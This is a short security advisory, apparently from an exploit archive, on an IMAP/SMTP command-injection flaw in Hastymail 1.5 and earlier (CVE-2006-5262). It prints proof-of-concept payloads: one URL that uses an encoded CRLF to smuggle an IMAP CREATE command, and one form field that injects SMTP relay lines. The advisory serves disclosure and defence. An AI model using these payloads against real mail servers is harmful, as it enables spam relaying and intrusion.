source: http://www.securityfocus.com/bid/20424/info Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input. An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system. Hastymail 1.5 and prior versions are affected. This example sends the CREATE IMAP commands to the vulnerable parameter: http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE %2522INBOX.vad The SMTP POST relay example from nonexistant email address is available: POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1 to include: Content-Disposition: form-data; name="subject" Proof of Concept . mail from: email@example.com rcpt to: firstname.lastname@example.org data This is a proof of concept of the SMTP command injection in Hastymail .
Related ExploitsTrying to match CVEs (1): CVE-2006-5262
Trying to match OSVDBs (1): 29564
Other Possible E-DB Search Terms: Hastymail 1.x, Hastymail
|2011-11-22||36347||Hastymail2 - 'rs' Parameter Cross-Site Scripting||HTrovao|
|2012-07-12||19758||Hastymail 2.1.1 RC1 - Command Injection (Metasploit)||Metasploit|
|2012-08-17||20578||hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting||Shai rod|